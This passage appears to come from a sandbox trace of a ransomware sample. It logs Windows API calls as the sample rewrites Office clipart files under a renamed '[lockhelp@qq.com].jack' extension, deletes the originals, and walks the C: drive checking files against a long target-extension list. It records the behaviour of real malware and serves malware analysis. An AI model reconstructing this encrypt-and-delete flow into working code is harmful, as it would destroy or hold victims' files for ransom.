office\\root\\clipart\\pub60cor\\ag00175_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0219.553] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.553] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0219.554] GetLastError () returned 0x0 [0219.554] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0xd32, lpOverlapped=0x0) returned 1 [0219.845] WriteFile (in: hFile=0x40c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xd40, lpOverlapped=0x0) returned 1 [0219.846] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.846] WriteFile (in: hFile=0x40c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xec, lpOverlapped=0x0) returned 1 [0219.846] SetEndOfFile (hFile=0x40c) returned 1 [0219.846] CloseHandle (hObject=0x40c) returned 1 [0219.847] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.847] SetEndOfFile (hFile=0x3ec) returned 1 [0219.847] CloseHandle (hObject=0x3ec) returned 1 [0219.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.848] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0219.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.848] lstrlenW (lpString=".doc") returned 4 [0219.848] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.848] lstrlenW (lpString=".docx") returned 5 [0219.848] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.848] lstrlenW (lpString=".pdf") returned 4 [0219.848] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.848] lstrlenW (lpString=".xls") returned 4 [0219.848] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.848] lstrlenW (lpString=".xlsx") returned 5 [0219.848] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.848] lstrlenW (lpString=".ppt") returned 4 [0219.848] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.848] lstrlenW (lpString=".zip") returned 4 [0219.848] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.849] lstrlenW (lpString=".rar") returned 4 [0219.849] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.849] lstrlenW (lpString=".bz2") returned 4 [0219.849] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.849] lstrlenW (lpString=".7z") returned 3 [0219.849] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.849] lstrlenW (lpString=".dbf") returned 4 [0219.849] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.849] lstrlenW (lpString=".1cd") returned 4 [0219.849] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.849] lstrlenW (lpString=".jpg") returned 4 [0219.849] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.849] lstrlenW (lpString=".doc") returned 4 [0219.849] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.849] lstrlenW (lpString=".docx") returned 5 [0219.849] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.849] lstrlenW (lpString=".pdf") returned 4 [0219.849] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.849] lstrlenW (lpString=".xls") returned 4 [0219.849] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.849] lstrlenW (lpString=".xlsx") returned 5 [0219.849] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.849] lstrlenW (lpString=".ppt") returned 4 [0219.849] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.849] lstrlenW (lpString=".zip") returned 4 [0219.849] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.849] lstrlenW (lpString=".rar") returned 4 [0219.850] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.850] lstrlenW (lpString=".bz2") returned 4 [0219.850] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.850] lstrlenW (lpString=".7z") returned 3 [0219.850] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.850] lstrlenW (lpString=".dbf") returned 4 [0219.850] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.850] lstrlenW (lpString=".1cd") returned 4 [0219.850] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0219.850] lstrlenW (lpString=".jpg") returned 4 [0219.850] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.850] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.850] lstrlenW (lpString="AN00965_.WMF") returned 12 [0219.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0219.850] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=7072) returned 1 [0219.850] CloseHandle (hObject=0x3ec) returned 1 [0219.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf")) returned 0x220 [0219.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0219.851] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.851] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0219.851] GetLastError () returned 0x0 [0219.851] ReadFile (hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0) Thread: id = 25 os_tid = 0x840 [0195.768] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x4001280 [0195.769] lstrlenW (lpString="C:") returned 2 [0195.769] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x604338 [0195.769] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0195.769] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0195.769] lstrlenW (lpString="$GetCurrent") returned 11 [0195.769] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0195.769] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x4011288 [0195.770] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0195.770] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x604738 [0195.770] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0195.770] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0195.770] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0195.770] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0195.770] lstrlenW (lpString="Logs") returned 4 [0195.770] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0195.770] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x4021290 [0195.770] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0195.770] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604378 [0195.772] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.772] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0195.772] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0195.772] lstrlenW (lpString=".1cd") returned 4 [0195.772] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0195.772] lstrlenW (lpString=".3ds") returned 4 [0195.772] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0195.772] lstrlenW (lpString=".3fr") returned 4 [0195.772] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0195.772] lstrlenW (lpString=".3g2") returned 4 [0195.772] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0195.772] lstrlenW (lpString=".3gp") returned 4 [0195.772] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0195.772] lstrlenW (lpString=".7z") returned 3 [0195.772] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0195.772] lstrlenW (lpString=".accda") returned 6 [0195.772] lstrcmpiW (lpString1=".accda", lpString2="66.log") returned -1 [0195.772] lstrlenW (lpString=".accdb") returned 6 [0195.772] lstrcmpiW (lpString1=".accdb", lpString2="66.log") returned -1 [0195.772] lstrlenW (lpString=".accdc") returned 6 [0195.772] lstrcmpiW (lpString1=".accdc", lpString2="66.log") returned -1 [0195.772] lstrlenW (lpString=".accde") returned 6 [0195.772] lstrcmpiW (lpString1=".accde", lpString2="66.log") returned -1 [0195.773] lstrlenW (lpString=".accdt") returned 6 [0195.773] lstrcmpiW (lpString1=".accdt", lpString2="66.log") returned -1 [0195.773] lstrlenW (lpString=".accdw") returned 6 [0195.773] lstrcmpiW (lpString1=".accdw", lpString2="66.log") returned -1 [0195.773] lstrlenW (lpString=".adb") returned 4 [0195.773] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".adp") returned 4 [0195.773] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".ai") returned 3 [0195.773] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0195.773] lstrlenW (lpString=".ai3") returned 4 [0195.773] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".ai4") returned 4 [0195.773] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".ai5") returned 4 [0195.773] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".ai6") returned 4 [0195.773] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".ai7") returned 4 [0195.773] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".ai8") returned 4 [0195.773] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".anim") returned 5 [0195.773] lstrcmpiW (lpString1=".anim", lpString2="6.log") returned -1 [0195.773] lstrlenW (lpString=".arw") returned 4 [0195.773] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0195.773] lstrlenW (lpString=".as") returned 3 [0195.773] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0195.773] lstrlenW (lpString=".asa") returned 4 [0195.773] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".asc") returned 4 [0195.774] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".ascx") returned 5 [0195.774] lstrcmpiW (lpString1=".ascx", lpString2="6.log") returned -1 [0195.774] lstrlenW (lpString=".asm") returned 4 [0195.774] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".asmx") returned 5 [0195.774] lstrcmpiW (lpString1=".asmx", lpString2="6.log") returned -1 [0195.774] lstrlenW (lpString=".asp") returned 4 [0195.774] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".aspx") returned 5 [0195.774] lstrcmpiW (lpString1=".aspx", lpString2="6.log") returned -1 [0195.774] lstrlenW (lpString=".asr") returned 4 [0195.774] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".asx") returned 4 [0195.774] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".avi") returned 4 [0195.774] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".avs") returned 4 [0195.774] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".backup") returned 7 [0195.774] lstrcmpiW (lpString1=".backup", lpString2="766.log") returned -1 [0195.774] lstrlenW (lpString=".bak") returned 4 [0195.774] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".bay") returned 4 [0195.774] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0195.774] lstrlenW (lpString=".bd") returned 3 [0195.774] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0195.774] lstrlenW (lpString=".bin") returned 4 [0195.774] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".bmp") returned 4 [0195.775] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".bz2") returned 4 [0195.775] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".c") returned 2 [0195.775] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0195.775] lstrlenW (lpString=".cdr") returned 4 [0195.775] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".cer") returned 4 [0195.775] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".cf") returned 3 [0195.775] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0195.775] lstrlenW (lpString=".cfc") returned 4 [0195.775] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".cfm") returned 4 [0195.775] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".cfml") returned 5 [0195.775] lstrcmpiW (lpString1=".cfml", lpString2="6.log") returned -1 [0195.775] lstrlenW (lpString=".cfu") returned 4 [0195.775] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".chm") returned 4 [0195.775] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".cin") returned 4 [0195.775] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".class") returned 6 [0195.775] lstrcmpiW (lpString1=".class", lpString2="66.log") returned -1 [0195.775] lstrlenW (lpString=".clx") returned 4 [0195.775] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0195.775] lstrlenW (lpString=".config") returned 7 [0195.775] lstrcmpiW (lpString1=".config", lpString2="766.log") returned -1 [0195.776] lstrlenW (lpString=".cpp") returned 4 [0195.776] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".cr2") returned 4 [0195.776] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".crt") returned 4 [0195.776] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".crw") returned 4 [0195.776] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".cs") returned 3 [0195.776] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0195.776] lstrlenW (lpString=".css") returned 4 [0195.776] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".csv") returned 4 [0195.776] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".cub") returned 4 [0195.776] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".dae") returned 4 [0195.776] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".dat") returned 4 [0195.776] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".db") returned 3 [0195.776] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0195.776] lstrlenW (lpString=".dbf") returned 4 [0195.776] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".dbx") returned 4 [0195.776] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".dc3") returned 4 [0195.776] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0195.776] lstrlenW (lpString=".dcm") returned 4 [0195.776] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".dcr") returned 4 [0195.777] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".der") returned 4 [0195.777] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".dib") returned 4 [0195.777] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".dic") returned 4 [0195.777] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".dif") returned 4 [0195.777] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".divx") returned 5 [0195.777] lstrcmpiW (lpString1=".divx", lpString2="6.log") returned -1 [0195.777] lstrlenW (lpString=".djvu") returned 5 [0195.777] lstrcmpiW (lpString1=".djvu", lpString2="6.log") returned -1 [0195.777] lstrlenW (lpString=".dng") returned 4 [0195.777] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".doc") returned 4 [0195.777] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".docm") returned 5 [0195.777] lstrcmpiW (lpString1=".docm", lpString2="6.log") returned -1 [0195.777] lstrlenW (lpString=".docx") returned 5 [0195.777] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0195.777] lstrlenW (lpString=".dot") returned 4 [0195.777] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0195.777] lstrlenW (lpString=".dotm") returned 5 [0195.777] lstrcmpiW (lpString1=".dotm", lpString2="6.log") returned -1 [0195.777] lstrlenW (lpString=".dotx") returned 5 [0195.777] lstrcmpiW (lpString1=".dotx", lpString2="6.log") returned -1 [0195.777] lstrlenW (lpString=".dpx") returned 4 [0195.778] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".dqy") returned 4 [0195.778] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".dsn") returned 4 [0195.778] lstrcmpiW (lpString1=".dsn", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".dt") returned 3 [0195.778] lstrcmpiW (lpString1=".dt", lpString2="log") returned -1 [0195.778] lstrlenW (lpString=".dtd") returned 4 [0195.778] lstrcmpiW (lpString1=".dtd", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".dwg") returned 4 [0195.778] lstrcmpiW (lpString1=".dwg", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".dwt") returned 4 [0195.778] lstrcmpiW (lpString1=".dwt", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".dx") returned 3 [0195.778] lstrcmpiW (lpString1=".dx", lpString2="log") returned -1 [0195.778] lstrlenW (lpString=".dxf") returned 4 [0195.778] lstrcmpiW (lpString1=".dxf", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".edml") returned 5 [0195.778] lstrcmpiW (lpString1=".edml", lpString2="6.log") returned -1 [0195.778] lstrlenW (lpString=".efd") returned 4 [0195.778] lstrcmpiW (lpString1=".efd", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".elf") returned 4 [0195.778] lstrcmpiW (lpString1=".elf", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".emf") returned 4 [0195.778] lstrcmpiW (lpString1=".emf", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".emz") returned 4 [0195.778] lstrcmpiW (lpString1=".emz", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".epf") returned 4 [0195.778] lstrcmpiW (lpString1=".epf", lpString2=".log") returned -1 [0195.778] lstrlenW (lpString=".eps") 